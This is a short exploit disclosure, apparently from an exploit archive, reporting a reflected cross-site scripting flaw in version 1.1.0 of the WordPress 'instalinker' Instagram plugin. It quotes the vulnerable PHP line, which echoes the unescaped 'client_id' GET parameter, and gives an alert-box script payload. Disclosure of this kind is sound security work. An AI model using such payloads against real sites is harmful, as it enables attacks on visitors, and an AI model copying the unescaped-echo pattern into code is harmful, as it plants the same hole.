WordPress Instagram 1.1.0 Cross Site Scripting
Posted on 08 February 2016
###################### # Exploit Title : WordPress Instagram Plugin 1.1.0 Cross Site Scripting # Exploit Author : Persian Hack Team # Vendor Homepage : https://wordpress.org/ # Software Link : https://wordpress.org/plugins/instalinker/ # Date: 2016/02/04 # Version : 1.1.0 ###################### # # Vulnerable code : # File Name: instalinker-admin-preview.php # instalinker/includes/instalinker-admin-preview.php?client_id=[XSS] # Payload : "><script>alert(1)</script> # Found at line 17 : # <?php echo !empty($_GET['client_id']) ? 'data-il-client-id="' . $_GET['client_id'] . '"' : ""; ?> # ###################### # Discovered by : # Mojtaba MobhaM (kazemimojtaba@live.com) # T3NZOG4N (t3nz0g4n@yahoo.com) # Homepage : persian-team.ir ######################